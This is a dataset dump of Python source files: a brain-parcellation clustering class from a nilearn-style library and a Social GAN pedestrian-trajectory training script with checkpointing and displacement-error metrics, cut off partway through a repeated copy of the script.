"""
return self.fit(imgs, confounds=confounds).transform(imgs, confounds)
def inverse_transform(self, signals):
"""Transform signals extracted from parcellations back to brain
images.
Uses `labels_img_` (parcellations) built at fit() level.
Parameters
----------
signals: List of 2D numpy.ndarray
Each 2D array with shape (number of scans, number of regions)
Returns
-------
imgs: List of or Nifti-like image
Brain image(s)
"""
from .signal_extraction import signals_to_img_labels
self._check_fitted()
if not isinstance(signals, (list, tuple)) or\
isinstance(signals, np.ndarray):
signals = [signals, ]
single_subject = True
elif isinstance(signals, (list, tuple)) and len(signals) == 1:
single_subject = True
else:
single_subject = False
imgs = Parallel(n_jobs=self.n_jobs)(
delayed(self._cache(signals_to_img_labels, func_memory_level=2))
(each_signal, self.labels_img_, self.mask_img_)
for each_signal in signals)
if single_subject:
return imgs[0]
else:
return imgs
| 38.746479
| 79
| 0.615568
|
import numpy as np
from sklearn.base import clone
from sklearn.feature_extraction import image
from sklearn.externals.joblib import Memory, delayed, Parallel
from .rena_clustering import ReNA
from ..decomposition.multi_pca import MultiPCA
from ..input_data import NiftiLabelsMasker
from .._utils.compat import _basestring
from .._utils.niimg import _safe_get_data
from .._utils.niimg_conversions import _iter_check_niimg
def _estimator_fit(data, estimator, method=None):
if method == 'rena':
rena = ReNA(mask_img=estimator.mask_img,
n_clusters=estimator.n_clusters,
scaling=estimator.scaling,
n_iter=estimator.n_iter,
threshold=estimator.threshold,
memory=estimator.memory,
memory_level=estimator.memory_level,
verbose=estimator.verbose)
rena.fit(data)
labels_ = rena.labels_
else:
estimator = clone(estimator)
estimator.fit(data.T)
labels_ = estimator.labels_
return labels_
def _check_parameters_transform(imgs, confounds):
if not isinstance(imgs, (list, tuple)) or \
isinstance(imgs, _basestring):
imgs = [imgs, ]
single_subject = True
elif isinstance(imgs, (list, tuple)) and len(imgs) == 1:
single_subject = True
else:
single_subject = False
if confounds is None and isinstance(imgs, (list, tuple)):
confounds = [None] * len(imgs)
if confounds is not None:
if not isinstance(confounds, (list, tuple)) or \
isinstance(confounds, _basestring):
confounds = [confounds, ]
if len(confounds) != len(imgs):
raise ValueError("Number of confounds given does not match with "
"the given number of images.")
return imgs, confounds, single_subject
def _labels_masker_extraction(img, masker, confound):
masker = clone(masker)
signals = masker.fit_transform(img, confounds=confound)
return signals
class Parcellations(MultiPCA):
VALID_METHODS = ['kmeans', 'ward', 'complete', 'average', 'rena']
def __init__(self, method, n_parcels=50,
random_state=0, mask=None, smoothing_fwhm=4.,
standardize=False, detrend=False,
low_pass=None, high_pass=None, t_r=None,
target_affine=None, target_shape=None,
mask_strategy='epi', mask_args=None,
scaling=False, n_iter=10,
memory=Memory(cachedir=None),
memory_level=0, n_jobs=1, verbose=1):
self.method = method
self.n_parcels = n_parcels
self.scaling = scaling
self.n_iter = n_iter
MultiPCA.__init__(self, n_components=200,
random_state=random_state,
mask=mask, memory=memory,
smoothing_fwhm=smoothing_fwhm,
standardize=standardize, detrend=detrend,
low_pass=low_pass, high_pass=high_pass,
t_r=t_r, target_affine=target_affine,
target_shape=target_shape,
mask_strategy=mask_strategy,
mask_args=mask_args,
memory_level=memory_level,
n_jobs=n_jobs,
verbose=verbose)
def _raw_fit(self, data):
valid_methods = self.VALID_METHODS
if self.method is None:
raise ValueError("Parcellation method is specified as None. "
"Please select one of the method in "
"{0}".format(valid_methods))
if self.method is not None and self.method not in valid_methods:
raise ValueError("The method you have selected is not implemented "
"'{0}'. Valid methods are in {1}"
.format(self.method, valid_methods))
try:
from nilearn import plotting
except Exception:
pass
components = MultiPCA._raw_fit(self, data)
mask_img_ = self.masker_.mask_img_
if self.verbose:
print("[{0}] computing {1}".format(self.__class__.__name__,
self.method))
if self.method == 'kmeans':
from sklearn.cluster import MiniBatchKMeans
kmeans = MiniBatchKMeans(n_clusters=self.n_parcels,
init='k-means++',
random_state=self.random_state,
verbose=max(0, self.verbose - 1))
labels = self._cache(_estimator_fit,
func_memory_level=1)(components.T, kmeans)
elif self.method == 'rena':
rena = ReNA(mask_img_, n_clusters=self.n_parcels,
scaling=self.scaling, n_iter=self.n_iter,
memory=self.memory, memory_level=self.memory_level,
verbose=max(0, self.verbose - 1))
method = 'rena'
labels = \
self._cache(_estimator_fit, func_memory_level=1)(components.T,
rena, method)
else:
mask_ = _safe_get_data(mask_img_).astype(np.bool)
shape = mask_.shape
connectivity = image.grid_to_graph(n_x=shape[0], n_y=shape[1],
n_z=shape[2], mask=mask_)
from sklearn.cluster import AgglomerativeClustering
agglomerative = AgglomerativeClustering(
n_clusters=self.n_parcels, connectivity=connectivity,
linkage=self.method, memory=self.memory)
labels = self._cache(_estimator_fit,
func_memory_level=1)(components.T,
agglomerative)
self.connectivity_ = connectivity
labels = labels + 1
self.labels_img_ = self.masker_.inverse_transform(labels)
return self
def _check_fitted(self):
if not hasattr(self, 'labels_img_'):
raise ValueError("Object has no labels_img_ attribute. "
"Ensure that fit() is called before transform.")
def transform(self, imgs, confounds=None):
self._check_fitted()
imgs, confounds, single_subject = _check_parameters_transform(
imgs, confounds)
imgs_list = _iter_check_niimg(imgs, atleast_4d=True)
masker = NiftiLabelsMasker(self.labels_img_,
mask_img=self.masker_.mask_img_,
smoothing_fwhm=self.smoothing_fwhm,
standardize=self.standardize,
detrend=self.detrend,
low_pass=self.low_pass,
high_pass=self.high_pass, t_r=self.t_r,
resampling_target='data',
memory=self.memory,
memory_level=self.memory_level,
verbose=self.verbose)
region_signals = Parallel(n_jobs=self.n_jobs)(
delayed(self._cache(_labels_masker_extraction,
func_memory_level=2))
(img, masker, confound)
for img, confound in zip(imgs_list, confounds))
if single_subject:
return region_signals[0]
else:
return region_signals
def fit_transform(self, imgs, confounds=None):
return self.fit(imgs, confounds=confounds).transform(imgs, confounds)
def inverse_transform(self, signals):
from .signal_extraction import signals_to_img_labels
self._check_fitted()
if not isinstance(signals, (list, tuple)) or\
isinstance(signals, np.ndarray):
signals = [signals, ]
single_subject = True
elif isinstance(signals, (list, tuple)) and len(signals) == 1:
single_subject = True
else:
single_subject = False
imgs = Parallel(n_jobs=self.n_jobs)(
delayed(self._cache(signals_to_img_labels, func_memory_level=2))
(each_signal, self.labels_img_, self.mask_img_)
for each_signal in signals)
if single_subject:
return imgs[0]
else:
return imgs
| true
| true
|
1c4932ee7a5e84c853b683328353f9c0b6b2e71a
| 22,244
|
py
|
Python
|
scripts/train.py
|
LucasPagano/sga-
|
5b4b88ebf826c2be022f34eb66d5a712b911724a
|
[
"MIT"
] | null | null | null |
scripts/train.py
|
LucasPagano/sga-
|
5b4b88ebf826c2be022f34eb66d5a712b911724a
|
[
"MIT"
] | null | null | null |
scripts/train.py
|
LucasPagano/sga-
|
5b4b88ebf826c2be022f34eb66d5a712b911724a
|
[
"MIT"
] | null | null | null |
import argparse
import gc
import logging
import os
import sys
import time
from collections import defaultdict
import torch
import torch.nn as nn
import torch.optim as optim
from sgan.data.loader import data_loader
from sgan.losses import gan_g_loss, gan_d_loss, l2_loss
from sgan.losses import displacement_error, final_displacement_error
from sgan.models import TrajectoryGenerator, TrajectoryDiscriminator
from sgan.utils import int_tuple, bool_flag, get_total_norm
from sgan.utils import relative_to_abs, get_dset_path
torch.backends.cudnn.benchmark = True
parser = argparse.ArgumentParser()
FORMAT = '[%(levelname)s: %(filename)s: %(lineno)4d]: %(message)s'
logging.basicConfig(level=logging.INFO, format=FORMAT, stream=sys.stdout)
logger = logging.getLogger(__name__)
# Dataset options
parser.add_argument('--dataset_name', default='trajectory_forecasting_benchmark', type=str)
parser.add_argument('--delim', default=' ')
parser.add_argument('--loader_num_workers', default=4, type=int)
parser.add_argument('--obs_len', default=8, type=int)
parser.add_argument('--pred_len', default=8, type=int)
parser.add_argument('--skip', default=1, type=int)
# Optimization
parser.add_argument('--batch_size', default=32, type=int)
parser.add_argument('--num_iterations', default=10000, type=int)
parser.add_argument('--num_epochs', default=200, type=int)
# Model Options
parser.add_argument('--embedding_dim', default=16, type=int)
parser.add_argument('--num_layers', default=1, type=int)
parser.add_argument('--dropout', default=0, type=float)
parser.add_argument('--batch_norm', default=0, type=bool_flag)
parser.add_argument('--mlp_dim', default=64, type=int)
# Generator Options
parser.add_argument('--encoder_h_dim_g', default=32, type=int)
parser.add_argument('--decoder_h_dim_g', default=64, type=int)
parser.add_argument('--noise_dim', default=8, type=int_tuple)
parser.add_argument('--noise_type', default='gaussian')
parser.add_argument('--noise_mix_type', default='gloval')
parser.add_argument('--clipping_threshold_g', default=1.5, type=float)
parser.add_argument('--g_learning_rate', default=1e-3, type=float)
parser.add_argument('--g_steps', default=1, type=int)
# Pooling Options
parser.add_argument('--pooling_type', default='pool_net')
parser.add_argument('--pool_every_timestep', default=0, type=bool_flag)
# Pool Net Option
parser.add_argument('--bottleneck_dim', default=32, type=int)
# Social Pooling Options
parser.add_argument('--neighborhood_size', default=2.0, type=float)
parser.add_argument('--grid_size', default=8, type=int)
# Discriminator Options
parser.add_argument('--d_type', default='local', type=str)
parser.add_argument('--encoder_h_dim_d', default=64, type=int)
parser.add_argument('--d_learning_rate', default=1e-3, type=float)
parser.add_argument('--d_steps', default=2, type=int)
parser.add_argument('--clipping_threshold_d', default=0, type=float)
# Loss Options
parser.add_argument('--l2_loss_weight', default=1, type=float)
parser.add_argument('--best_k', default=10, type=int)
# Output
parser.add_argument('--output_dir', default=os.getcwd())
parser.add_argument('--print_every', default=50, type=int)
parser.add_argument('--checkpoint_every', default=100, type=int)
parser.add_argument('--checkpoint_name', default='checkpoint')
parser.add_argument('--checkpoint_start_from', default=None)
parser.add_argument('--restore_from_checkpoint', default=0, type=int)
parser.add_argument('--num_samples_check', default=5000, type=int)
# Misc
parser.add_argument('--use_gpu', default=1, type=int)
parser.add_argument('--timing', default=0, type=int)
parser.add_argument('--gpu_num', default="0", type=str)
def init_weights(m):
classname = m.__class__.__name__
if classname.find('Linear') != -1:
nn.init.kaiming_normal_(m.weight)
def get_dtypes(args):
long_dtype = torch.LongTensor
float_dtype = torch.FloatTensor
if args.use_gpu == 1:
long_dtype = torch.cuda.LongTensor
float_dtype = torch.cuda.FloatTensor
return long_dtype, float_dtype
def main(args):
os.environ["CUDA_VISIBLE_DEVICES"] = args.gpu_num
train_path = get_dset_path(args.dataset_name, 'train')
val_path = get_dset_path(args.dataset_name, 'val')
long_dtype, float_dtype = get_dtypes(args)
logger.info("Initializing train dataset")
train_dset, train_loader = data_loader(args, train_path)
logger.info("Initializing val dataset")
_, val_loader = data_loader(args, val_path)
iterations_per_epoch = len(train_dset) / args.batch_size / args.d_steps
if args.num_epochs:
args.num_iterations = int(iterations_per_epoch * args.num_epochs)
logger.info(
'There are {} iterations per epoch'.format(iterations_per_epoch)
)
generator = TrajectoryGenerator(
obs_len=args.obs_len,
pred_len=args.pred_len,
embedding_dim=args.embedding_dim,
encoder_h_dim=args.encoder_h_dim_g,
decoder_h_dim=args.decoder_h_dim_g,
mlp_dim=args.mlp_dim,
num_layers=args.num_layers,
noise_dim=args.noise_dim,
noise_type=args.noise_type,
noise_mix_type=args.noise_mix_type,
pooling_type=args.pooling_type,
pool_every_timestep=args.pool_every_timestep,
dropout=args.dropout,
bottleneck_dim=args.bottleneck_dim,
neighborhood_size=args.neighborhood_size,
grid_size=args.grid_size,
batch_norm=args.batch_norm)
generator.apply(init_weights)
generator.type(float_dtype).train()
logger.info('Here is the generator:')
logger.info(generator)
discriminator = TrajectoryDiscriminator(
obs_len=args.obs_len,
pred_len=args.pred_len,
embedding_dim=args.embedding_dim,
h_dim=args.encoder_h_dim_d,
mlp_dim=args.mlp_dim,
num_layers=args.num_layers,
dropout=args.dropout,
batch_norm=args.batch_norm,
d_type=args.d_type)
discriminator.apply(init_weights)
discriminator.type(float_dtype).train()
logger.info('Here is the discriminator:')
logger.info(discriminator)
g_loss_fn = gan_g_loss
d_loss_fn = gan_d_loss
optimizer_g = optim.Adam(generator.parameters(), lr=args.g_learning_rate)
optimizer_d = optim.Adam(
discriminator.parameters(), lr=args.d_learning_rate
)
# Maybe restore from checkpoint
restore_path = None
if args.checkpoint_start_from is not None:
restore_path = args.checkpoint_start_from
elif args.restore_from_checkpoint == 1:
restore_path = os.path.join(args.output_dir,
'%s_with_model.pt' % args.checkpoint_name)
if restore_path is not None and os.path.isfile(restore_path):
logger.info('Restoring from checkpoint {}'.format(restore_path))
checkpoint = torch.load(restore_path)
generator.load_state_dict(checkpoint['g_state'])
discriminator.load_state_dict(checkpoint['d_state'])
optimizer_g.load_state_dict(checkpoint['g_optim_state'])
optimizer_d.load_state_dict(checkpoint['d_optim_state'])
t = checkpoint['counters']['t']
epoch = checkpoint['counters']['epoch']
checkpoint['restore_ts'].append(t)
else:
# Starting from scratch, so initialize checkpoint data structure
t, epoch = 0, 0
checkpoint = {
'args': args.__dict__,
'G_losses': defaultdict(list),
'D_losses': defaultdict(list),
'losses_ts': [],
'metrics_val': defaultdict(list),
'metrics_train': defaultdict(list),
'sample_ts': [],
'restore_ts': [],
'norm_g': [],
'norm_d': [],
'counters': {
't': None,
'epoch': None,
},
'g_state': None,
'g_optim_state': None,
'd_state': None,
'd_optim_state': None,
'g_best_state': None,
'd_best_state': None,
'best_t': None,
'g_best_nl_state': None,
'd_best_state_nl': None,
'best_t_nl': None,
}
t0 = None
while t < args.num_iterations:
gc.collect()
d_steps_left = args.d_steps
g_steps_left = args.g_steps
epoch += 1
logger.info('Starting epoch {}'.format(epoch))
for batch in train_loader:
if args.timing == 1:
torch.cuda.synchronize()
t1 = time.time()
# Decide whether to use the batch for stepping on discriminator or
# generator; an iteration consists of args.d_steps steps on the
# discriminator followed by args.g_steps steps on the generator.
if d_steps_left > 0:
step_type = 'd'
losses_d = discriminator_step(args, batch, generator,
discriminator, d_loss_fn,
optimizer_d)
checkpoint['norm_d'].append(
get_total_norm(discriminator.parameters()))
d_steps_left -= 1
elif g_steps_left > 0:
step_type = 'g'
losses_g = generator_step(args, batch, generator,
discriminator, g_loss_fn,
optimizer_g)
checkpoint['norm_g'].append(
get_total_norm(generator.parameters())
)
g_steps_left -= 1
if args.timing == 1:
torch.cuda.synchronize()
t2 = time.time()
logger.info('{} step took {}'.format(step_type, t2 - t1))
# Skip the rest if we are not at the end of an iteration
if d_steps_left > 0 or g_steps_left > 0:
continue
if args.timing == 1:
if t0 is not None:
logger.info('Interation {} took {}'.format(
t - 1, time.time() - t0
))
t0 = time.time()
# Maybe save loss
if t % args.print_every == 0:
logger.info('t = {} / {}'.format(t + 1, args.num_iterations))
for k, v in sorted(losses_d.items()):
logger.info(' [D] {}: {:.3f}'.format(k, v))
checkpoint['D_losses'][k].append(v)
for k, v in sorted(losses_g.items()):
logger.info(' [G] {}: {:.3f}'.format(k, v))
checkpoint['G_losses'][k].append(v)
checkpoint['losses_ts'].append(t)
# Maybe save a checkpoint
if t > 0 and t % args.checkpoint_every == 0:
checkpoint['counters']['t'] = t
checkpoint['counters']['epoch'] = epoch
checkpoint['sample_ts'].append(t)
# Check stats on the validation set
logger.info('Checking stats on val ...')
metrics_val = check_accuracy(
args, val_loader, generator, discriminator, d_loss_fn
)
logger.info('Checking stats on train ...')
metrics_train = check_accuracy(
args, train_loader, generator, discriminator,
d_loss_fn, limit=True
)
for k, v in sorted(metrics_val.items()):
logger.info(' [val] {}: {:.3f}'.format(k, v))
checkpoint['metrics_val'][k].append(v)
for k, v in sorted(metrics_train.items()):
logger.info(' [train] {}: {:.3f}'.format(k, v))
checkpoint['metrics_train'][k].append(v)
min_ade = min(checkpoint['metrics_val']['ade'])
min_ade_nl = min(checkpoint['metrics_val']['ade_nl'])
if metrics_val['ade'] == min_ade:
logger.info('New low for avg_disp_error')
checkpoint['best_t'] = t
checkpoint['g_best_state'] = generator.state_dict()
checkpoint['d_best_state'] = discriminator.state_dict()
if metrics_val['ade_nl'] == min_ade_nl:
logger.info('New low for avg_disp_error_nl')
checkpoint['best_t_nl'] = t
checkpoint['g_best_nl_state'] = generator.state_dict()
checkpoint['d_best_nl_state'] = discriminator.state_dict()
# Save another checkpoint with model weights and
# optimizer state
checkpoint['g_state'] = generator.state_dict()
checkpoint['g_optim_state'] = optimizer_g.state_dict()
checkpoint['d_state'] = discriminator.state_dict()
checkpoint['d_optim_state'] = optimizer_d.state_dict()
checkpoint_path = os.path.join(
args.output_dir, '%s_with_model.pt' % args.checkpoint_name
)
logger.info('Saving checkpoint to {}'.format(checkpoint_path))
torch.save(checkpoint, checkpoint_path)
logger.info('Done.')
# Save a checkpoint with no model weights by making a shallow
# copy of the checkpoint excluding some items
checkpoint_path = os.path.join(
args.output_dir, '%s_no_model.pt' % args.checkpoint_name)
logger.info('Saving checkpoint to {}'.format(checkpoint_path))
key_blacklist = [
'g_state', 'd_state', 'g_best_state', 'g_best_nl_state',
'g_optim_state', 'd_optim_state', 'd_best_state',
'd_best_nl_state'
]
small_checkpoint = {}
for k, v in checkpoint.items():
if k not in key_blacklist:
small_checkpoint[k] = v
torch.save(small_checkpoint, checkpoint_path)
logger.info('Done.')
t += 1
d_steps_left = args.d_steps
g_steps_left = args.g_steps
if t >= args.num_iterations:
break
def discriminator_step(
args, batch, generator, discriminator, d_loss_fn, optimizer_d
):
batch = [tensor.cuda() for tensor in batch]
(obs_traj, pred_traj_gt, obs_traj_rel, pred_traj_gt_rel, non_linear_ped,
loss_mask, seq_start_end) = batch
losses = {}
loss = torch.zeros(1).to(pred_traj_gt)
generator_out = generator(obs_traj, obs_traj_rel, seq_start_end)
pred_traj_fake_rel = generator_out
pred_traj_fake = relative_to_abs(pred_traj_fake_rel, obs_traj[-1])
traj_real = torch.cat([obs_traj, pred_traj_gt], dim=0)
traj_real_rel = torch.cat([obs_traj_rel, pred_traj_gt_rel], dim=0)
traj_fake = torch.cat([obs_traj, pred_traj_fake], dim=0)
traj_fake_rel = torch.cat([obs_traj_rel, pred_traj_fake_rel], dim=0)
scores_fake = discriminator(traj_fake, traj_fake_rel, seq_start_end)
scores_real = discriminator(traj_real, traj_real_rel, seq_start_end)
# Compute loss with optional gradient penalty
data_loss = d_loss_fn(scores_real, scores_fake)
losses['D_data_loss'] = data_loss.item()
loss += data_loss
losses['D_total_loss'] = loss.item()
optimizer_d.zero_grad()
loss.backward()
if args.clipping_threshold_d > 0:
nn.utils.clip_grad_norm_(discriminator.parameters(),
args.clipping_threshold_d)
optimizer_d.step()
return losses
def generator_step(
args, batch, generator, discriminator, g_loss_fn, optimizer_g
):
batch = [tensor.cuda() for tensor in batch]
(obs_traj, pred_traj_gt, obs_traj_rel, pred_traj_gt_rel, non_linear_ped,
loss_mask, seq_start_end) = batch
losses = {}
loss = torch.zeros(1).to(pred_traj_gt)
g_l2_loss_rel = []
loss_mask = loss_mask[:, args.obs_len:]
for _ in range(args.best_k):
generator_out = generator(obs_traj, obs_traj_rel, seq_start_end)
pred_traj_fake_rel = generator_out
pred_traj_fake = relative_to_abs(pred_traj_fake_rel, obs_traj[-1])
if args.l2_loss_weight > 0:
g_l2_loss_rel.append(args.l2_loss_weight * l2_loss(
pred_traj_fake_rel,
pred_traj_gt_rel,
loss_mask,
mode='raw'))
g_l2_loss_sum_rel = torch.zeros(1).to(pred_traj_gt)
if args.l2_loss_weight > 0:
g_l2_loss_rel = torch.stack(g_l2_loss_rel, dim=1)
for start, end in seq_start_end.data:
_g_l2_loss_rel = g_l2_loss_rel[start:end]
_g_l2_loss_rel = torch.sum(_g_l2_loss_rel, dim=0)
_g_l2_loss_rel = torch.min(_g_l2_loss_rel) / torch.sum(
loss_mask[start:end])
g_l2_loss_sum_rel += _g_l2_loss_rel
losses['G_l2_loss_rel'] = g_l2_loss_sum_rel.item()
loss += g_l2_loss_sum_rel
traj_fake = torch.cat([obs_traj, pred_traj_fake], dim=0)
traj_fake_rel = torch.cat([obs_traj_rel, pred_traj_fake_rel], dim=0)
scores_fake = discriminator(traj_fake, traj_fake_rel, seq_start_end)
discriminator_loss = g_loss_fn(scores_fake)
loss += discriminator_loss
losses['G_discriminator_loss'] = discriminator_loss.item()
losses['G_total_loss'] = loss.item()
optimizer_g.zero_grad()
loss.backward()
if args.clipping_threshold_g > 0:
nn.utils.clip_grad_norm_(
generator.parameters(), args.clipping_threshold_g
)
optimizer_g.step()
return losses
def check_accuracy(
args, loader, generator, discriminator, d_loss_fn, limit=False
):
d_losses = []
metrics = {}
g_l2_losses_abs, g_l2_losses_rel = ([],) * 2
disp_error, disp_error_l, disp_error_nl = ([],) * 3
f_disp_error, f_disp_error_l, f_disp_error_nl = ([],) * 3
total_traj, total_traj_l, total_traj_nl = 0, 0, 0
loss_mask_sum = 0
generator.eval()
with torch.no_grad():
for batch in loader:
batch = [tensor.cuda() for tensor in batch]
(obs_traj, pred_traj_gt, obs_traj_rel, pred_traj_gt_rel,
non_linear_ped, loss_mask, seq_start_end) = batch
linear_ped = 1 - non_linear_ped
loss_mask = loss_mask[:, args.obs_len:]
pred_traj_fake_rel = generator(
obs_traj, obs_traj_rel, seq_start_end
)
pred_traj_fake = relative_to_abs(pred_traj_fake_rel, obs_traj[-1])
g_l2_loss_abs, g_l2_loss_rel = cal_l2_losses(
pred_traj_gt, pred_traj_gt_rel, pred_traj_fake,
pred_traj_fake_rel, loss_mask
)
ade, ade_l, ade_nl = cal_ade(
pred_traj_gt, pred_traj_fake, linear_ped, non_linear_ped
)
fde, fde_l, fde_nl = cal_fde(
pred_traj_gt, pred_traj_fake, linear_ped, non_linear_ped
)
traj_real = torch.cat([obs_traj, pred_traj_gt], dim=0)
traj_real_rel = torch.cat([obs_traj_rel, pred_traj_gt_rel], dim=0)
traj_fake = torch.cat([obs_traj, pred_traj_fake], dim=0)
traj_fake_rel = torch.cat([obs_traj_rel, pred_traj_fake_rel], dim=0)
scores_fake = discriminator(traj_fake, traj_fake_rel, seq_start_end)
scores_real = discriminator(traj_real, traj_real_rel, seq_start_end)
d_loss = d_loss_fn(scores_real, scores_fake)
d_losses.append(d_loss.item())
g_l2_losses_abs.append(g_l2_loss_abs.item())
g_l2_losses_rel.append(g_l2_loss_rel.item())
disp_error.append(ade.item())
disp_error_l.append(ade_l.item())
disp_error_nl.append(ade_nl.item())
f_disp_error.append(fde.item())
f_disp_error_l.append(fde_l.item())
f_disp_error_nl.append(fde_nl.item())
loss_mask_sum += torch.numel(loss_mask.data)
total_traj += pred_traj_gt.size(1)
total_traj_l += torch.sum(linear_ped).item()
total_traj_nl += torch.sum(non_linear_ped).item()
if limit and total_traj >= args.num_samples_check:
break
metrics['d_loss'] = sum(d_losses) / len(d_losses)
metrics['g_l2_loss_abs'] = sum(g_l2_losses_abs) / loss_mask_sum
metrics['g_l2_loss_rel'] = sum(g_l2_losses_rel) / loss_mask_sum
metrics['ade'] = sum(disp_error) / (total_traj * args.pred_len)
metrics['fde'] = sum(f_disp_error) / total_traj
if total_traj_l != 0:
metrics['ade_l'] = sum(disp_error_l) / (total_traj_l * args.pred_len)
metrics['fde_l'] = sum(f_disp_error_l) / total_traj_l
else:
metrics['ade_l'] = 0
metrics['fde_l'] = 0
if total_traj_nl != 0:
metrics['ade_nl'] = sum(disp_error_nl) / (
total_traj_nl * args.pred_len)
metrics['fde_nl'] = sum(f_disp_error_nl) / total_traj_nl
else:
metrics['ade_nl'] = 0
metrics['fde_nl'] = 0
generator.train()
return metrics
def cal_l2_losses(
pred_traj_gt, pred_traj_gt_rel, pred_traj_fake, pred_traj_fake_rel,
loss_mask
):
g_l2_loss_abs = l2_loss(
pred_traj_fake, pred_traj_gt, loss_mask, mode='sum'
)
g_l2_loss_rel = l2_loss(
pred_traj_fake_rel, pred_traj_gt_rel, loss_mask, mode='sum'
)
return g_l2_loss_abs, g_l2_loss_rel
def cal_ade(pred_traj_gt, pred_traj_fake, linear_ped, non_linear_ped):
ade = displacement_error(pred_traj_fake, pred_traj_gt)
ade_l = displacement_error(pred_traj_fake, pred_traj_gt, linear_ped)
ade_nl = displacement_error(pred_traj_fake, pred_traj_gt, non_linear_ped)
return ade, ade_l, ade_nl
def cal_fde(
pred_traj_gt, pred_traj_fake, linear_ped, non_linear_ped
):
fde = final_displacement_error(pred_traj_fake[-1], pred_traj_gt[-1])
fde_l = final_displacement_error(
pred_traj_fake[-1], pred_traj_gt[-1], linear_ped
)
fde_nl = final_displacement_error(
pred_traj_fake[-1], pred_traj_gt[-1], non_linear_ped
)
return fde, fde_l, fde_nl
if __name__ == '__main__':
args = parser.parse_args()
main(args)
| 38.351724
| 91
| 0.630507
|
import argparse
import gc
import logging
import os
import sys
import time
from collections import defaultdict
import torch
import torch.nn as nn
import torch.optim as optim
from sgan.data.loader import data_loader
from sgan.losses import gan_g_loss, gan_d_loss, l2_loss
from sgan.losses import displacement_error, final_displacement_error
from sgan.models import TrajectoryGenerator, TrajectoryDiscriminator
from sgan.utils import int_tuple, bool_flag, get_total_norm
from sgan.utils import relative_to_abs, get_dset_path
torch.backends.cudnn.benchmark = True
parser = argparse.ArgumentParser()
FORMAT = '[%(levelname)s: %(filename)s: %(lineno)4d]: %(message)s'
logging.basicConfig(level=logging.INFO, format=FORMAT, stream=sys.stdout)
logger = logging.getLogger(__name__)
parser.add_argument('--dataset_name', default='trajectory_forecasting_benchmark', type=str)
parser.add_argument('--delim', default=' ')
parser.add_argument('--loader_num_workers', default=4, type=int)
parser.add_argument('--obs_len', default=8, type=int)
parser.add_argument('--pred_len', default=8, type=int)
parser.add_argument('--skip', default=1, type=int)
parser.add_argument('--batch_size', default=32, type=int)
parser.add_argument('--num_iterations', default=10000, type=int)
parser.add_argument('--num_epochs', default=200, type=int)
parser.add_argument('--embedding_dim', default=16, type=int)
parser.add_argument('--num_layers', default=1, type=int)
parser.add_argument('--dropout', default=0, type=float)
parser.add_argument('--batch_norm', default=0, type=bool_flag)
parser.add_argument('--mlp_dim', default=64, type=int)
parser.add_argument('--encoder_h_dim_g', default=32, type=int)
parser.add_argument('--decoder_h_dim_g', default=64, type=int)
parser.add_argument('--noise_dim', default=8, type=int_tuple)
parser.add_argument('--noise_type', default='gaussian')
parser.add_argument('--noise_mix_type', default='gloval')
parser.add_argument('--clipping_threshold_g', default=1.5, type=float)
parser.add_argument('--g_learning_rate', default=1e-3, type=float)
parser.add_argument('--g_steps', default=1, type=int)
parser.add_argument('--pooling_type', default='pool_net')
parser.add_argument('--pool_every_timestep', default=0, type=bool_flag)
parser.add_argument('--bottleneck_dim', default=32, type=int)
parser.add_argument('--neighborhood_size', default=2.0, type=float)
parser.add_argument('--grid_size', default=8, type=int)
parser.add_argument('--d_type', default='local', type=str)
parser.add_argument('--encoder_h_dim_d', default=64, type=int)
parser.add_argument('--d_learning_rate', default=1e-3, type=float)
parser.add_argument('--d_steps', default=2, type=int)
parser.add_argument('--clipping_threshold_d', default=0, type=float)
parser.add_argument('--l2_loss_weight', default=1, type=float)
parser.add_argument('--best_k', default=10, type=int)
parser.add_argument('--output_dir', default=os.getcwd())
parser.add_argument('--print_every', default=50, type=int)
parser.add_argument('--checkpoint_every', default=100, type=int)
parser.add_argument('--checkpoint_name', default='checkpoint')
parser.add_argument('--checkpoint_start_from', default=None)
parser.add_argument('--restore_from_checkpoint', default=0, type=int)
parser.add_argument('--num_samples_check', default=5000, type=int)
parser.add_argument('--use_gpu', default=1, type=int)
parser.add_argument('--timing', default=0, type=int)
parser.add_argument('--gpu_num', default="0", type=str)
def init_weights(m):
classname = m.__class__.__name__
if classname.find('Linear') != -1:
nn.init.kaiming_normal_(m.weight)
def get_dtypes(args):
long_dtype = torch.LongTensor
float_dtype = torch.FloatTensor
if args.use_gpu == 1:
long_dtype = torch.cuda.LongTensor
float_dtype = torch.cuda.FloatTensor
return long_dtype, float_dtype
def main(args):
os.environ["CUDA_VISIBLE_DEVICES"] = args.gpu_num
train_path = get_dset_path(args.dataset_name, 'train')
val_path = get_dset_path(args.dataset_name, 'val')
long_dtype, float_dtype = get_dtypes(args)
logger.info("Initializing train dataset")
train_dset, train_loader = data_loader(args, train_path)
logger.info("Initializing val dataset")
_, val_loader = data_loader(args, val_path)
iterations_per_epoch = len(train_dset) / args.batch_size / args.d_steps
if args.num_epochs:
args.num_iterations = int(iterations_per_epoch * args.num_epochs)
logger.info(
'There are {} iterations per epoch'.format(iterations_per_epoch)
)
generator = TrajectoryGenerator(
obs_len=args.obs_len,
pred_len=args.pred_len,
embedding_dim=args.embedding_dim,
encoder_h_dim=args.encoder_h_dim_g,
decoder_h_dim=args.decoder_h_dim_g,
mlp_dim=args.mlp_dim,
num_layers=args.num_layers,
noise_dim=args.noise_dim,
noise_type=args.noise_type,
noise_mix_type=args.noise_mix_type,
pooling_type=args.pooling_type,
pool_every_timestep=args.pool_every_timestep,
dropout=args.dropout,
bottleneck_dim=args.bottleneck_dim,
neighborhood_size=args.neighborhood_size,
grid_size=args.grid_size,
batch_norm=args.batch_norm)
generator.apply(init_weights)
generator.type(float_dtype).train()
logger.info('Here is the generator:')
logger.info(generator)
discriminator = TrajectoryDiscriminator(
obs_len=args.obs_len,
pred_len=args.pred_len,
embedding_dim=args.embedding_dim,
h_dim=args.encoder_h_dim_d,
mlp_dim=args.mlp_dim,
num_layers=args.num_layers,
dropout=args.dropout,
batch_norm=args.batch_norm,
d_type=args.d_type)
discriminator.apply(init_weights)
discriminator.type(float_dtype).train()
logger.info('Here is the discriminator:')
logger.info(discriminator)
g_loss_fn = gan_g_loss
d_loss_fn = gan_d_loss
optimizer_g = optim.Adam(generator.parameters(), lr=args.g_learning_rate)
optimizer_d = optim.Adam(
discriminator.parameters(), lr=args.d_learning_rate
)
restore_path = None
if args.checkpoint_start_from is not None:
restore_path = args.checkpoint_start_from
elif args.restore_from_checkpoint == 1:
restore_path = os.path.join(args.output_dir,
'%s_with_model.pt' % args.checkpoint_name)
if restore_path is not None and os.path.isfile(restore_path):
